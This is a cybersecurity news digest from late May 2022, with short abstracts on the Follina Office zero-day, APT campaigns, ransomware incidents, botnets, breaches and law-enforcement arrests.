May, 2022
May 31, 2022 – APT
Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability Full Text
Abstract
An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems. "TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in a tweet. "Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app." TA413 is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as Exile RAT and Sepulcher as well as a rogue Firefox browser extension dubbed FriarFox . The high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the "ms-msdt:" protocol URI scheme to execute arbitrary code. SpecificThe Hacker News
May 31, 2022 – Hacker
Hackers steal WhatsApp accounts using call forwarding trick Full Text
Abstract
There's a trick that allows attackers to hijack a victim's WhatsApp account and gain access to personal messages and contact list.BleepingComputer
May 31, 2022 – General
Malware Volumes Decline as Trojan Distribution Surges Full Text
Abstract
Trojan families that affected users the most included Mobtes (44.35%), Piom (32.61%), and Boogr (14.32%). Iran at 35.25% stands as the most impacted country by mobile malware.Cyware Alerts - Hacker News
May 31, 2022 – General
Latest Mobile Malware Report Suggests On-Device Fraud is on the Rise Full Text
Abstract
An analysis of the mobile threat landscape in 2022 shows that Spain and Turkey are the most targeted countries for malware campaigns, even as a mix of new and existing banking trojans are increasingly targeting Android devices to conduct on-device fraud (ODF). Other frequently targeted countries include Poland, Australia, the U.S., Germany, the U.K., Italy, France, and Portugal. "The most worrying leitmotif is the increasing attention to On-Device Fraud (ODF)," Dutch cybersecurity company ThreatFabric said in a report shared with The Hacker News. "Just in the first five months of 2022 there has been an increase of more than 40% in malware families that abuse Android OS to perform fraud using the device itself, making it almost impossible to detect them using traditional fraud scoring engines." Hydra , FluBot (aka Cabassous), Cerberus , Octo , and ERMAC accounted for the most active banking trojans based on the number of samples observed during the sameThe Hacker News
May 31, 2022 – APT
SideWinder carried out over 1,000 attacks since April 2020 Full Text
Abstract
SideWinder, an aggressive APT group, is believed to have carried out over 1,000 attacks since April 2020, Kaspersky reported. Researchers from Kaspersky have analyzed the activity of an aggressive threat actor tracked as SideWinder (aka RattleSnake...Security Affairs
May 31, 2022 – APT
Windows MSDT zero-day now exploited by Chinese APT hackers Full Text
Abstract
Chinese-linked threat actors are now actively exploiting a Microsoft Office zero-day vulnerability (known as 'Follina') to execute malicious code remotely on Windows systems.BleepingComputer
May 31, 2022 – General
Key Trends in The Verizon Data Breach Investigation Report 2022 Full Text
Abstract
According to the report, ransomware attacks continue to mount pressure on organizations worldwide as researchers recorded a 13% increase in such attacks. While 40% of ransomware incidents were executed via desktop sharing software, 35% involved the use of email.Cyware Alerts - Hacker News
May 31, 2022 – Attack
SideWinder Hackers Launched Over a 1,000 Cyber Attacks Over the Past 2 Years Full Text
Abstract
An "aggressive" advanced persistent threat (APT) group known as SideWinder has been linked to over 1,000 new attacks since April 2020. "Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their operations," cybersecurity firm Kaspersky said in a report that was presented at Black Hat Asia this month. SideWinder , also called Rattlesnake or T-APT-04, is said to have been active since at least 2012 with a track record of targeting military, defense, aviation, IT companies, and legal firms in Central Asian countries such as Afghanistan, Bangladesh, Nepal, and Pakistan. Kaspersky's APT trends report for Q1 2022 published late last month revealed that the threat actor is actively expanding the geography of its targets beyond its traditional victim profile to otherThe Hacker News
May 31, 2022 – Vulnerabilities
Microsoft shared workarounds for the Microsoft Office zero-day dubbed Follina Full Text
Abstract
Microsoft released workarounds for a recently discovered zero-day vulnerability, dubbed Follina, in the Microsoft Office productivity suite. Microsoft has released workarounds for a recently discovered zero-day vulnerability, dubbed...Security Affairs
May 31, 2022 – Vulnerabilities
Over 3.6 million MySQL servers found exposed on the Internet Full Text
Abstract
Over 3.6 million MySQL servers are publicly exposed on the Internet and responding to queries, making them an attractive target to hackers and extortionists.BleepingComputer
May 31, 2022 – Breach
Australia’s National Disability Insurance Scheme Hit by Breach at Case Management System Provider Full Text
Abstract
CTARS, a Sydney-based software and analytics provider for the disability and care sectors, this week revealed an unauthorized third-party had gained access to its systems on May 15.IT News
May 31, 2022 – Education
Learn Raspberry Pi and Arduino with 9 Online Developer Training Courses Full Text
Abstract
This is an exciting time for the Internet of Things . According to Deloitte research, the average U.S. household now has 25 connected devices — and new products are being launched every day. This rush of demand means that many tech companies are looking for developers with IoT knowledge. And even if you don't want to specialize in this field, the programming skills are transferable. Featuring nine full-length video courses, The 2022 Complete Raspberry Pi & Arduino Developer Bundle provides a really good introduction to this world. The included training is worth a total of $1,800, but readers of The Hacker News can currently pick up the bundle for only $39.99 . Special Offer — For a limited time, you can get lifetime access to nine courses on Arduino and Raspberry Pi development for just $39.99 . That's a massive 97% off the total price. Both the Raspberry Pi and the Arduino were specifically designed to help people learn how to code. But both devices have also been usThe Hacker News
May 31, 2022 – Attack
Experts warn of ransomware attacks against government organizations of small states Full Text
Abstract
Cyber Research Labs reported a rise in ransomware attacks in the second quarter of 2022, small states are more exposed to these attacks. Cyber Research Labs observed a rise in ransomware attacks in the second quarter of 2022, some of them with a severe...Security Affairs
May 31, 2022 – Government
FBI warns of Ukrainian charities impersonated to steal donations Full Text
Abstract
Scammers are claiming to be collecting donations to help Ukrainian refugees and war victims while impersonating legitimate Ukrainian humanitarian aid organizations, according to the Federal Bureau of Investigation (FBI).BleepingComputer
May 31, 2022 – Solution
Microsoft is rolling out these security settings to protect millions of accounts Full Text
Abstract
Microsoft began rolling out security defaults to customers who created a new Azure AD tenant after October 2019, but didn't enable the defaults for customers that created Azure AD tenants prior to October 2019.ZDNet
May 31, 2022 – Attack
Costa Rica’s public health agency hit by Hive ransomware Full Text
Abstract
All computer systems on the network of Costa Rica's public health service (known as Costa Rican Social Security Fund or CCCS) are now offline following a Hive ransomware attack that hit them this morning.BleepingComputer
May 31, 2022 – Business
Hoxhunt Raises $40M in Series B Funding Full Text
Abstract
Hoxhunt, a Helsinki, Finland–based cybersecurity training platform provider, raised $40 million in Series B funding. The round was led by Level Equity Management, with participation from existing investor Icebreaker.vc.FinSMEs
May 31, 2022 – Botnet
New XLoader botnet uses probability theory to hide its servers Full Text
Abstract
Threat analysts have spotted a new version of the XLoader botnet malware that uses probability theory to hide its command and control servers, making it difficult to disrupt the malware's operation.BleepingComputer
May 31, 2022 – Attack
Experts warn of ransomware attacks against government organizations of small states Full Text
Abstract
The experts at Cyber Research Labs warn of ransomware attacks against government organizations. They observed a total of 48 government organizations from 21 countries that were hit by 13 ransomware attacks in 2022.Security Affairs
May 31, 2022 – Education
Aligning Your Password Policy enforcement with NIST Guidelines Full Text
Abstract
Although most organizations are not required by law to comply with NIST standards, it is usually in an organization's best interest to follow NIST's cybersecurity standards. This is especially true for NIST's password guidelines.BleepingComputer
May 31, 2022 – Encryption
Singapore ups investment in quantum computing to stay ahead of security threats Full Text
Abstract
The Singapore government on Tuesday announced plans to set aside SG$23.5 million (US$17.09 million) to support three national platforms, parked under its Quantum Engineering Programme (QEP), for up to 3.5 years.ZDNet
May 31, 2022 – Solution
Microsoft shares mitigation for Office zero-day exploited in attacks Full Text
Abstract
Microsoft has shared mitigation measures to block attacks exploiting a newly discovered Microsoft Office zero-day flaw abused in the wild to execute malicious code remotely.BleepingComputer
May 30, 2022 – Criminals
Interpol Nabs 3 Nigerian Scammers Behind Malware-based Attacks Full Text
Abstract
Interpol on Monday announced the arrest of three suspected global scammers in Nigeria for using remote access trojans (RATs) such as Agent Tesla to facilitate malware-enabled cyber fraud. "The men are thought to have used the RAT to reroute financial transactions, stealing confidential online connection details from corporate organizations, including oil and gas companies in South East Asia, the Middle East and North Africa," the International Criminal Police Organization said in a statement. One of the scammers in question, named Hendrix Omorume, has been charged and convicted of three counts of financial fraud and has been sentenced to a 12-month prison term. The two other suspects are still on trial. The three Nigerian individuals, who are aged between 31 and 38, have been apprehended for being in possession of fake documents such as fraudulent invoices and forged official letters. The law enforcement said that the suspects systematically used Agent Tesla to breachThe Hacker News
May 30, 2022 – Vulnerabilities
Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation Full Text
Abstract
Microsoft on Monday published guidance for a newly discovered zero-day security flaw in its Office productivity suite that could be exploited to achieve code execution on affected systems. The weakness, now assigned the identifier CVE-2022-30190 , is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and Office 2021, as well as Professional Plus editions, are impacted. "To help protect customers, we've published CVE-2022-30190 and additional guidance here ," a Microsoft spokesperson told The Hacker News in an emailed statement. The Follina vulnerability, which came to light late last week, involved a real-world exploit that leveraged the shortcoming in a weaponized Word document to execute arbitrary PowerShell code by making use of the "ms-msdt:" URI scheme. The sample was uploaded to VirusTotal from Belarus. But first signs of exploitation of the flaw date backThe Hacker News
May 30, 2022 – Privacy
Vodafone plans carrier-level user tracking for targeted ads Full Text
Abstract
Vodafone is piloting a new advertising ID system called TrustPid, which will work as a persistent user tracker at the mobile Internet Service Provider (ISP) level.BleepingComputer
May 30, 2022 – Covid-19
Double-whammy attack follows fake Covid alert with a bogus bank call Full Text
Abstract
The BBC has revealed details of how a food bank in the United Kingdom was conned out of about $63,000 (£50,000) by scammers who used two separate attacks to fleece their victims.Malwarebytes Labs
May 30, 2022 – General
Is 3rd Party App Access the New Executable File? Full Text
Abstract
It's no secret that 3rd party apps can boost productivity, enable remote and hybrid work and are overall, essential in building and scaling a company's work processes. An innocuous process much like clicking on an attachment was in the earlier days of email, people don't think twice when connecting an app they need with their Google workspace or M365 environment, etc. Simple actions that users take, from creating an email to updating a contact in the CRM, can result in several other automatic actions and notifications in the connected platforms. As seen in the image below, the OAuth mechanism makes it incredibly easy to interconnect apps and many don't consider what the possible ramifications could be. When these apps and other add-ons for SaaS platforms ask for permissions' access, they are usually granted without a second thought, presenting more opportunities for bad actors to gain access to a company's data. This puts companies at risk for supply chainThe Hacker News
May 30, 2022 – Criminals
Three Nigerian men arrested in INTERPOL Operation Killer Bee Full Text
Abstract
Interpol arrested three Nigerian men in Lagos, who are suspected of using the Agent Tesla RAT to reroute financial transactions and steal sensitive data. Interpol arrested 3 Nigerian men in Lagos, as part of an international operation codenamed Killer...Security Affairs
May 30, 2022 – Denial Of Service
Italy warns organizations to brace for incoming DDoS attacks Full Text
Abstract
The Computer Security Incident Response Team in Italy issued an urgent alert yesterday to raise awareness about the high risk of cyberattacks against national bodies and organizations on Monday.BleepingComputer
May 30, 2022 – Attack
North Orange County Community College District was hit by ransomware in January Full Text
Abstract
Cypress College and Fullerton College experienced a ransomware attack. They immediately took steps to confirm the security of their systems, including the deployment of an advanced threat protection and monitoring tool.Data Breaches
May 30, 2022 – Botnet
EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities Full Text
Abstract
A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS). "The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices." First disclosed by Securonix in March and later by Fortinet , Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ. Enemybot, which is capable of carrying out DDoS attacks , draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant revealsThe Hacker News
May 30, 2022 – Phishing
A new WhatsApp OTP scam could allow the hijacking of users’ accounts Full Text
Abstract
Experts warn of a new ongoing WhatsApp OTP scam that could allow attackers to hijack users’ accounts through phone calls. Recently CloudSEK founder Rahul Sasi warned of an ongoing WhatsApp OTP scam that could allow threat actors to hijack users’...Security Affairs
May 30, 2022 – Policy and Law
Three Nigerians arrested for malware-assisted financial crimes Full Text
Abstract
Interpol has announced the arrest of three Nigerian men in Lagos, who are suspected of using remote access trojans (RATs) to reroute financial transactions and steal account credentials.BleepingComputer
May 30, 2022 – Malware
Linux malware is on the rise—6 types of attacks to look for Full Text
Abstract
Security is the weakest when sysadmins and developers race against time and deadlines. Opportunistic attackers take advantage of the "economy of attention" as developers can often overlook security risks.CSO Online
May 30, 2022 – Malware
Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild Full Text
Abstract
Cybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems. The vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (" 05-2022-0438.doc ") that was uploaded to VirusTotal from an IP address in Belarus. "It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code," the researchers noted in a series of tweets last week. According to security researcher Kevin Beaumont, who dubbed the flaw "Follina," the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload. The shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in tThe Hacker News
May 30, 2022 – Vulnerabilities
Multiple Microsoft Office versions impacted by an actively exploited zero-day Full Text
Abstract
A zero-day flaw in Microsoft Office that could be exploited by attackers to achieve arbitrary code execution on Windows systems. The cybersecurity researcher nao_sec discovered a malicious Word document ("05-2022-0438.doc") that was uploaded to VirusTotal...Security Affairs
May 30, 2022 – Attack
New Microsoft Office zero-day used in attacks to execute PowerShell Full Text
Abstract
Security researchers have discovered a new Microsoft Office zero-day vulnerability that is being used in attacks to execute malicious PowerShell commands via Microsoft Diagnostic Tool (MSDT) simply by opening a Word document.BleepingComputer
May 30, 2022 – Government
Credentials of Higher Education Institutions Available For Sale: FBI Warns Full Text
Abstract
The FBI alerted that credentials stolen from the higher education sector are being sold on multiple public and dark web marketplaces. In some cases, VPN and network access credentials are being sold for thousands of dollars. The FBI recommends colleges and universities pay special attention to conn ... Read MoreCyware Alerts - Hacker News
May 30, 2022 – Attack
GoodWill Ransomware victims have to perform socially driven activities to decryption their data Full Text
Abstract
Researchers discovered a new ransomware family called GoodWill that asks victims to donate the ransom for social causes. CloudSEK’s Threat Intelligence Research team has disclosed a new ransomware strain called GoodWill, that demands...Security Affairs
May 30, 2022 – General
$39.5 billion lost to phone scams in last year Full Text
Abstract
A recent study estimates that a staggering $39.5 billion was lost to phone scams this past year, which is the highest number recorded since Truecaller began researching scam and spam calls in the U.S. eight years ago.Help Net Security
May 30, 2022 – Malware
EnemyBot malware adds new exploits to target CMS servers and Android devices Full Text
Abstract
The operators of the EnemyBot botnet added exploits for recently disclosed flaws in VMware, F5 BIG-IP, and Android systems. Operators behind the EnemyBot botnet are expanding the list of potential targets adding exploits for recently disclosed critical...Security Affairs
May 30, 2022 – Breach
Spirit Super Member Data Exposed After Security Breach Full Text
Abstract
The personal data that may have been comprised is akin to the information found in an annual statement. It includes items like name, addresses, ages, email addresses, telephone numbers, member account numbers and member balances.financialstandard
May 30, 2022 – General
IT threat evolution in Q1 2022. Mobile statistics Full Text
Abstract
One of the schemes used by scammers which has been becoming more popular since last year are scam apps for receiving social benefits. These apps redirect to a webpage asking for personal data to claim a large sum of money.Securelist
May 30, 2022 – Business
Hornetsecurity acquires IT-Seal to add security training services to its portfolio Full Text
Abstract
Located in Darmstadt, Germany, IT-Seal specializes in establishing a sustainable security culture. It employs innovative technologies to train employees at businesses and organizations worldwide.Help Net Security
May 30, 2022 – Attack
Document Exploiting New Microsoft Office Zero-Day Seen in the Wild Full Text
Abstract
On May 27, a researcher who uses the online moniker “nao_sec” reported on Twitter that they had found an interesting malicious document on the VirusTotal malware scanning service.Security Week
May 29, 2022 – Attack
New ‘GoodWill’ Ransomware Forces Victims to Donate Money and Clothes to the Poor Full Text
Abstract
Cybersecurity researchers have disclosed a new ransomware strain called GoodWill that compels victims into donating for social causes and provide financial assistance to people in need. "The ransomware group propagates very unusual demands in exchange for the decryption key," researchers from CloudSEK said in a report published last week. "The Robin Hood-like group claims to be interested in helping the less fortunate, rather than extorting victims for financial motivations." Written in .NET, the ransomware was first identified by the India-based cybersecurity firm in March 2022, with the infections rendering sensitive files inaccessible without decrypting them. The malware, which makes use of the AES algorithm for encryption, is also notable for sleeping for 722.45 seconds to interfere with dynamic analysis. The encryption process is followed by displaying a multiple-paged ransom note that requires the victims to carry out three socially-driven activitieThe Hacker News
May 29, 2022 – Breach
FBI Warns About Hackers Selling VPN Credentials for U.S. College Networks Full Text
Abstract
Network credentials and virtual private network (VPN) access for colleges and universities based in the U.S. are being advertised for sale on underground and public criminal marketplaces. "This exposure of sensitive credential and network access information, especially privileged user accounts, could lead to subsequent cyber attacks against individual users or affiliated organizations," the U.S. Federal Bureau of Investigation (FBI) said in an advisory published last week. The cyber intrusions against educational institutions involve threat actors leveraging tactics like spear-phishing and ransomware to carry out credential harvesting activities. The gathered credentials are then exfiltrated and sold on Russian cybercrime forums for prices ranging from a few to thousands of U.S. dollars. Armed with this login information, the agency pointed out, adversaries can proceed to conduct brute-force credential stuffing attacks to break into victim accounts spanning differentThe Hacker News
May 29, 2022 – Malware
EnemyBot malware adds exploits for critical VMware, F5 BIG-IP flaws Full Text
Abstract
EnemyBot, a botnet based on code from multiple malware pieces, is expanding its reach by quickly adding exploits for recently disclosed critical vulnerabilities in web servers, content management systems, IoT, and Android devices.BleepingComputer
May 29, 2022 – Hacker
Pro-Russian hacker group KillNet plans to attack Italy on May 30 Full Text
Abstract
Pro-Russian hacker group KillNet is threatening again Italy, it announced a massive and unprecedented attack on May 30. Pro-Russian hacker group KillNet is threatening again Italy, it announced a massive and unprecedented attack on May 30. Pro-Russian...Security Affairs
May 29, 2022 – General
Mobile trojan detections rise as malware distribution level declines Full Text
Abstract
Kaspersky's quarterly report on mobile malware distribution records a downward trend that started at the end of 2020, detecting one-third of the malicious installations reported in Q1 2021, and about 85% of those counted in Q4 2021.BleepingComputer
May 29, 2022 – General
Security Affairs newsletter Round 367 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Experts...Security Affairs
May 29, 2022 – Criminals
New Yorker imprisoned for role in carding group behind $568M damages Full Text
Abstract
John Telusma, a 37-year-old man from New York, was sentenced to four years in prison for selling and using stolen and compromised credit cards on the Infraud carding portal operated by the transnational cybercrime organization with the same name.BleepingComputer
May 29, 2022 – Policy and Law
US man sentenced to 4 years in prison for his role in Infraud scheme Full Text
Abstract
A man from New York was sentenced to four years in prison for trading stolen credit card data and assisting the Infraud Organization. John Telusma (aka 'Peterelliot'), a New York man from New York (37), was sentenced this week to four years in prison...Security Affairs
May 28, 2022 – Ransomware
Cheerscrypt Ransomware Targets VMware ESXi Servers Full Text
Abstract
The widescale use of VMware ESXi in enterprises has now attracted a new Cheerscrypt ransomware threat that is targeting poorly secured ESXi servers. According to the ransom notes, the attackers give their victims three days to access the provided Tor site to negotiate the ransom payment for a worki ... Read MoreCyware Alerts - Hacker News
May 28, 2022 – Policy and Law
New York Man Sentenced to 4 Years in Transnational Cybercrime Scheme Full Text
Abstract
A 37-year-old man from New York has been sentenced to four years in prison for buying stolen credit card information and working in cahoots with a cybercrime cartel known as the Infraud Organization. John Telusma, who went by the alias "Peterelliot," pleaded guilty to one count of racketeering conspiracy on October 13, 2021. He joined the gang in August 2011 and remained a member for five-and-a-half years. "Telusma was among the most prolific and active members of the Infraud Organization, purchasing and fraudulently using compromised credit card numbers for his own personal gain," the U.S. Justice Department (DoJ) said . Infraud, a transnational cybercrime behemoth, operated for more than seven years, advertising its activities under the slogan "In Fraud We Trust," before its online infrastructure was dismantled by U.S. law enforcement authorities in February 2018. The rogue enterprise dabbled in the large-scale acquisition and sale of compromisedThe Hacker News
May 28, 2022 – Criminals
Industrial Spy: Data Extortion Marketplace Ventures into Ransomware Full Text
Abstract
MalwareHunterTeam discovered a new malware sample containing a ransom note instead of a promotional text. The note states that the gang has stolen the victim’s data, along with encrypting it.Cyware Alerts - Hacker News
May 28, 2022 – Vulnerabilities
Microsoft Finds Critical Bugs in Pre-Installed Apps on Millions of Android Devices Full Text
Abstract
Four high severity vulnerabilities have been disclosed in a framework used by pre-installed Android System apps with millions of downloads. The issues, now fixed by its Israeli developer MCE Systems, could have potentially allowed threat actors to stage remote and local attacks or be abused as vectors to obtain sensitive information by taking advantage of their extensive system privileges. "As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device," the Microsoft 365 Defender Research Team said in a report published Friday. The weaknesses, which range from command-injection to local privilege escalation, have been assigned the identifiers CVE-2021-42598, CVE-2021-42599, CVE-2021-42600, and CVE-2021-42601, with CVSS scores between 7.0 and 8.9. Command injection proof-of-concept (POC) exploit code Injecting a similThe Hacker News
May 28, 2022 – Criminals
Clop ransomware gang is back, hits 21 victims in a single month Full Text
Abstract
After effectively shutting down their entire operation for several months, between November and February, the Clop ransomware is now back according to NCC Group researchers.BleepingComputer
May 28, 2022 – APT
Experts believe that Russian Gamaredon APT could fuel a new round of DDoS attacks Full Text
Abstract
360 Qihoo reported DDoS attacks launched by APT-C-53 (aka Gamaredon) conducted through the open-source DDoS Trojan program LOIC. Researchers at 360 Qihoo observed a wave of DDoS attacks launched by Russia-linked APT-C-53 (aka Gamaredon) and reported...Security Affairs
May 28, 2022 – Malware
New Windows Subsystem for Linux malware steals browser auth cookies Full Text
Abstract
Hackers are showing an increased interest in the Windows Subsystem for Linux (WSL) as an attack surface as they build new malware, the more advanced samples being suitable for espionage and downloading additional malicious modules.BleepingComputer
May 28, 2022 – Criminals
The strange link between Industrial Spy and the Cuba ransomware operation Full Text
Abstract
The recently launched Industrial Spy data extortion marketplace has now started its ransomware operation. In April, Malware HunterTeam and Bleeping Computer reported the launch of a new dark web marketplace called Industrial Spy that sells stolen...Security Affairs
May 28, 2022 – APT
Reuters: Russia-linked APT behind Brexit leak website Full Text
Abstract
Russia-linked threat actors are behind a new website that published leaked emails from leading proponents of Britain's exit from the EU, the Reuters reported. According to a Google cybersecurity official and the former head of UK foreign intelligence,...Security Affairs
May 28, 2022 – Breach
GitHub: Nearly 100,000 NPM Users’ credentials stolen in the April OAuth token attack Full Text
Abstract
GitHub provided additional details into the theft of its integration OAuth tokens that occurred in April, with nearly 100,000 NPM users' credentials. GitHub provided additional details about the incident that suffered in April, the attackers were...Security Affairs
May 28, 2022 – Vulnerabilities
GitHub saved plaintext passwords of npm users in log files Full Text
Abstract
GitHub has revealed it stored a "number of plaintext user credentials for the npm registry" in internal logs following the integration of the JavaScript package registry into GitHub's logging systems.The Register
May 28, 2022 – Government
CISA adds 75 actively exploited bugs to its must-patch list in just a week Full Text
Abstract
The US cybersecurity authority is urging everyone to patch a number of software flaws, including some older ones in Microsoft's Silverlight plug-in and Adobe Flash Player.ZDNet
May 27, 2022 – Government
FBI warns of hackers selling credentials for U.S. college networks Full Text
Abstract
Cybercriminals are offering to sell for thousands of U.S. dollars network access credentials for higher education institutions based in the United States.BleepingComputer
May 27, 2022 – Vulnerabilities
Experts Detail New RCE Vulnerability Affecting Google Chrome Dev Channel Full Text
Abstract
Details have emerged about a recently patched critical remote code execution vulnerability in the V8 JavaScript and WebAssembly engine used in Google Chrome and Chromium-based browsers. The issue relates to a case of use-after-free in the instruction optimization component, successful exploitation of which could "allow an attacker to execute arbitrary code in the context of the browser." The flaw, which was identified in the Dev channel version of Chrome 101, was reported to Google by Weibo Wang, a security researcher at Singapore cybersecurity company Numen Cyber Technology and has since been quietly fixed by the company. "This vulnerability occurs in the instruction selection stage, where the wrong instruction has been selected and resulting in memory access exception," Wang said . Use-after-free flaws occur when previous-freed memory is accessed, inducing undefined behavior and causing a program to crash, use corrupted data, or even achieve executionThe Hacker News
May 27, 2022 – General
How to Start a Cybersecurity Clinic Full Text
Abstract
University-based cybersecurity clinics are a way for universities to meet their ideals and responsibilities for public service by addressing two intersecting challenges at once: the growing need for experienced cybersecurity talent and developing resilience in important, at-risk sectors.Lawfare
May 27, 2022 – General
The Effects of Digital Transnational Repression and the Responsibility of Host States Full Text
Abstract
Digital transnational repression has a chilling effect on exiled and diaspora activists and dissidents who find themselves repressed by authoritarian states, even in places where they assumed they had a relative degree of safety and freedom.Lawfare
May 27, 2022 – General
Android pre-installed apps are affected by high-severity vulnerabilities Full Text
Abstract
Microsoft found several high-severity vulnerabilities in a mobile framework used in pre-installed Android System apps. The Microsoft 365 Defender Research Team discovered four vulnerabilities (CVE-2021-42598, CVE-2021-42599, CVE-2021-42600,...Security Affairs
May 27, 2022 – Breach
GitHub: Attackers stole login details of 100K npm user accounts Full Text
Abstract
GitHub revealed today that an attacker stole the login details of roughly 100,000 npm accounts during a mid-April security breach with the help of stolen OAuth app tokens issued to Heroku and Travis-CI.BleepingComputer
May 27, 2022 – Breach
Nearly 100,000 NPM Users’ Credentials Stolen in GitHub OAuth Breach Full Text
Abstract
Cloud-based repository hosting service GitHub on Friday shared additional details into the theft of GitHub integration OAuth tokens last month, noting that the attacker was able to access internal NPM data and its customer information. "Using stolen OAuth user tokens originating from two third-party integrators, Heroku and Travis CI, the attacker was able to escalate access to NPM infrastructure," Greg Ose said , adding the attacker then managed to obtain a number of files - A database backup of skimdb.npmjs.com consisting of data as of April 7, 2021, including an archive of user information from 2015 and all private NPM package manifests and package metadata. The archive contained NPM usernames, password hashes, and email addresses for roughly 100,000 users A set of CSV files encompassing an archive of all names and version numbers of published versions of all NPM private packages as of April 10, 2022, and A "small subset" of private packages from two orgaThe Hacker News
May 27, 2022 – General
GhostTouch: how to remotely control touchscreens with EMI Full Text
Abstract
Security researchers devised a technique, dubbed GhostTouch, to remotely control touchscreens using electromagnetic signals. A team of researchers from Zhejiang University and Technical University of Darmstadt devised a technique, dubbed GhostTouch,...Security Affairs
May 27, 2022 – Vulnerabilities
Microsoft finds severe bugs in Android apps from large mobile providers Full Text
Abstract
Microsoft security researchers have found high severity vulnerabilities in a framework used by Android apps from multiple large international mobile service providers.BleepingComputer
May 27, 2022 – Vulnerabilities
Patch released for cross-domain cookie leakage flaw in Guzzle Full Text
Abstract
The flaw resides in Guzzle’s cookie middleware, which is disabled by default, “so most library consumers will not be affected by this issue”, reads a GitHub security advisory published by a Guzzle maintainer on Wednesday (May 25).The Daily Swig
May 27, 2022 – Education
The Myths of Ransomware Attacks and How To Mitigate Risk Full Text
Abstract
Today's modern companies are built on data, which now resides across countless cloud apps. Therefore preventing data loss is essential to your success. This is especially critical for mitigating against rising ransomware attacks — a threat that 57% of security leaders expect to be compromised by within the next year . As organizations continue to evolve, in turn so does ransomware . To help you stay ahead, Lookout Chief Strategy Officer, Aaron Cockerill met with Microsoft Chief Security Advisor, Sarah Armstrong-Smith to discuss how remote work and the cloud have made it more difficult to spot a ransomware attack, as well as how deploying behavioral-anomaly-based detection can help mitigate ransomware risk. Access the full interview . Aaron Cockerill: I feel like the way modern enterprises operate, which includes a combination of technologies, has allowed the ransomware to thrive. Having experienced this type of attack in my past roles, I know how many CISOs are feelingThe Hacker News
May 27, 2022 – Government
FBI: Compromised US academic credentials available on various cybercrime forums Full Text
Abstract
The FBI warns organizations in the higher education sector of credentials sold on cybercrime forums that can allow threat actors to access their networks. The FBI issued an alert to inform the higher education sector about the availability of login...Security Affairs
May 27, 2022 – Business
Microsoft to force better security defaults for all Azure AD tenants Full Text
Abstract
Microsoft has announced that it will force enable stricter secure default settings known as 'security defaults' on all existing Azure Active Directory (Azure AD) tenants starting in late June 2022.BleepingComputer
May 27, 2022 – Outage
Cyber attack downs Regina Public Schools’ computer systems Full Text
Abstract
In a statement published to social media networks on Thursday afternoon, officials said that after "several days of investigation" it has become clear that the incident that first began on Sunday is a cyberattack.CBC
May 27, 2022 – Vulnerabilities
Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely Full Text
Abstract
Researchers have demonstrated what they call the "first active contactless attack against capacitive touchscreens." GhostTouch , as it's called, "uses electromagnetic interference (EMI) to inject fake touch points into a touchscreen without the need to physically touch it," a group of academics from Zhejiang University and Technical University of Darmstadt said in a new research paper. The core idea is to take advantage of the electromagnetic signals to execute basic touch events such as taps and swipes into targeted locations of the touchscreen with the goal of taking over remote control and manipulating the underlying device. The attack, which works from a distance of up to 40mm, hinges on the fact that capacitive touchscreens are sensitive to EMI, leveraging it to inject electromagnetic signals into transparent electrodes that are built into the touchscreen so as to register them as touch events. The experimental setup involves an electrostatic gunThe Hacker News
May 27, 2022 – Malware
ERMAC 2.0 Android Banking Trojan targets over 400 apps Full Text
Abstract
A new version of the ERMAC Android banking trojan is able to target an increased number of apps. The ERMAC Android banking trojan version 2.0 can target an increasing number of applications, passing from 378 to 467 target applications to steal account...Security Affairs
May 27, 2022 – Ransomware
BlackCat/ALPHV ransomware asks $5 million to unlock Austrian state Full Text
Abstract
Austrian federal state Carinthia has been hit by the BlackCat ransomware gang, also known as ALPHV, who demanded a $5 million to unlock the encrypted computer systems.BleepingComputer
May 27, 2022 – Criminals
Exposed: the threat actors who are poisoning Facebook Full Text
Abstract
An investigation of the infamous “Is That You?” video scam has led Cybernews researchers to a cybercriminal stronghold, from which threat actors have been infecting the social media giant with thousands of malicious links every day.Security Affairs
May 27, 2022 – Vulnerabilities
Zyxel Issues Patches for 4 New Flaws Affecting AP, API Controller, and Firewall Devices Full Text
Abstract
